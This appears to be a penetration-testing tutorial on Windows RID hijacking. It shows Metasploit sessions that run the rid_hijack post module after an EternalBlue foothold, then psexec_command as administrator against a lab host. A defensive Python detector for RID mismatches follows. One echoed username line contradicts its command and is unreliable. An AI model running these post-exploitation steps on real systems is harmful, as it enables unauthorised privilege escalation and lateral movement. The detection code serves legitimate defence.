RID hijacking principle:
Every account has an assigned RID that identifies it. Unlike domain controllers, Windows workstations and servers store most of this data under the HKLM\SAM\SAM\Domains\Account\Users key, which requires SYSTEM privileges to access. The module changes an account's attributes by setting its relative identifier (RID) to one that should belong to a different existing account on the target machine. Exploiting a weakness in how Windows maintains the integrity of local user management, the module allows authenticating with the credentials of one known account (such as the Guest account) while obtaining the privileges of another existing account (such as the Administrator account), even if the Administrator account is disabled.
Of course, you first need a shell on the Windows target; background it and use it as the session.
```shell
msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/manage/rid_hijack
msf5 post(windows/manage/rid_hijack) > set session 2
session => 2
msf5 post(windows/manage/rid_hijack) > show options

Module options (post/windows/manage/rid_hijack):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   GETSYSTEM      false            yes       Attempt to get SYSTEM privilege on the target host.
   GUEST_ACCOUNT  false            yes       Assign the defined RID to the Guest Account.
   PASSWORD                        no        Password to set to the defined user account.
   RID            500              yes       RID to set to the specified account.
   SESSION        2                yes       The session to run this module on.
   USERNAME                        no        User to set the defined RID.

msf5 post(windows/manage/rid_hijack) > set username ridhijack
username => administrator
msf5 post(windows/manage/rid_hijack) > set password xxxxxxxxxxx
password => xxxxxxxxxxx
msf5 post(windows/manage/rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf5 post(windows/manage/rid_hijack) > run
```
```shell
msf5 post(windows/manage/rid_hijack) > use auxiliary/admin/smb/psexec_command
msf5 auxiliary(admin/smb/psexec_command) > set rhosts 172.16.204.80
rhosts => 172.16.204.80
msf5 auxiliary(admin/smb/psexec_command) > show options

Module options (auxiliary/admin/smb/psexec_command):

   Name                  Current Setting                    Required  Description
   ----                  ---------------                    --------  -----------
   COMMAND               net group "Domain Admins" /domain  yes       The command you want to execute on the remote host
   RHOSTS                172.16.204.80                      yes       The target address range or CIDR identifier
   RPORT                 445                                yes       The Target port
   SERVICE_DESCRIPTION                                      no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                     no        The service display name
   SERVICE_NAME                                             no        The service name
   SMBDomain             .                                  no        The Windows domain to use for authentication
   SMBPass                                                  no        The password for the specified username
   SMBSHARE              C$                                 yes       The name of a writeable share on the server
   SMBUser                                                  no        The username to authenticate as
   THREADS               1                                  yes       The number of concurrent threads
   WINPATH               WINDOWS                            yes       The name of the remote Windows directory

msf5 auxiliary(admin/smb/psexec_command) > set smbuser administrator
smbuser => administrator
msf5 auxiliary(admin/smb/psexec_command) > set smbpass xxxxx
smbpass => xxxxx
msf5 auxiliary(admin/smb/psexec_command) > set smbdomain sec.com
smbdomain => sec.com
msf5 auxiliary(admin/smb/psexec_command) > set command whoami
command => whoami
msf5 auxiliary(admin/smb/psexec_command) > run
```
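As an added defensive example (not part of the original post or of the Metasploit module): the hijack described above leaves the RID stored inside an account's F value disagreeing with the RID encoded in that account's key name under HKLM\SAM\SAM\Domains\Account\Users. The Python check below flags that mismatch over constructed sample F values; on a live host the values would have to be exported as SYSTEM, and the F-value offsets (RID at 0x30, ACB flags at 0x38) are assumptions taken from the commonly documented SAM layout.

```python
import struct

# Assumed layout of the SAM user "F" value (commonly documented samparse layout):
# the account RID is a little-endian DWORD at 0x30, the ACB account-control
# flags are a WORD at 0x38, and bit 0x0001 of ACB means "account disabled".
RID_OFFSET = 0x30
ACB_OFFSET = 0x38
ACB_DISABLED = 0x0001


def parse_f_value(f_bytes):
    """Return (rid, acb_flags, disabled) decoded from a user's F value."""
    if len(f_bytes) < ACB_OFFSET + 2:
        raise ValueError("F value too short to be a SAM user record")
    rid = struct.unpack_from("<I", f_bytes, RID_OFFSET)[0]
    acb = struct.unpack_from("<H", f_bytes, ACB_OFFSET)[0]
    return rid, acb, bool(acb & ACB_DISABLED)


def find_rid_hijacks(users):
    """users maps each Users subkey name (the RID as 8 hex digits, e.g. '000001F5')
    to the raw bytes of its F value. Returns one finding per account whose stored
    RID differs from the RID in its own key name, which is what a hijack leaves."""
    findings = []
    for key_name, f_bytes in users.items():
        key_rid = int(key_name, 16)
        stored_rid, acb, disabled = parse_f_value(f_bytes)
        if stored_rid != key_rid:
            findings.append({"key_rid": key_rid, "stored_rid": stored_rid,
                             "disabled": disabled})
    return findings


def make_f_value(rid, acb):
    """Build a constructed, minimal F value for testing (all other fields zero)."""
    f = bytearray(0x50)
    struct.pack_into("<I", f, RID_OFFSET, rid)
    struct.pack_into("<H", f, ACB_OFFSET, acb)
    return bytes(f)


# Constructed sample: Administrator (0x1F4) disabled and consistent, an ordinary
# user consistent, and the Guest key (0x1F5) whose F value now claims RID 500.
SAMPLE_USERS = {
    "000001F4": make_f_value(0x1F4, 0x0011),  # Administrator: disabled | normal
    "000001F5": make_f_value(0x1F4, 0x0010),  # Guest key storing RID 500: hijacked
    "000003E9": make_f_value(0x3E9, 0x0010),  # ordinary local user, consistent
}

if __name__ == "__main__":
    for hit in find_rid_hijacks(SAMPLE_USERS):
        print("RID mismatch: key 0x%X stores RID %d (disabled=%s)"
              % (hit["key_rid"], hit["stored_rid"], hit["disabled"]))
```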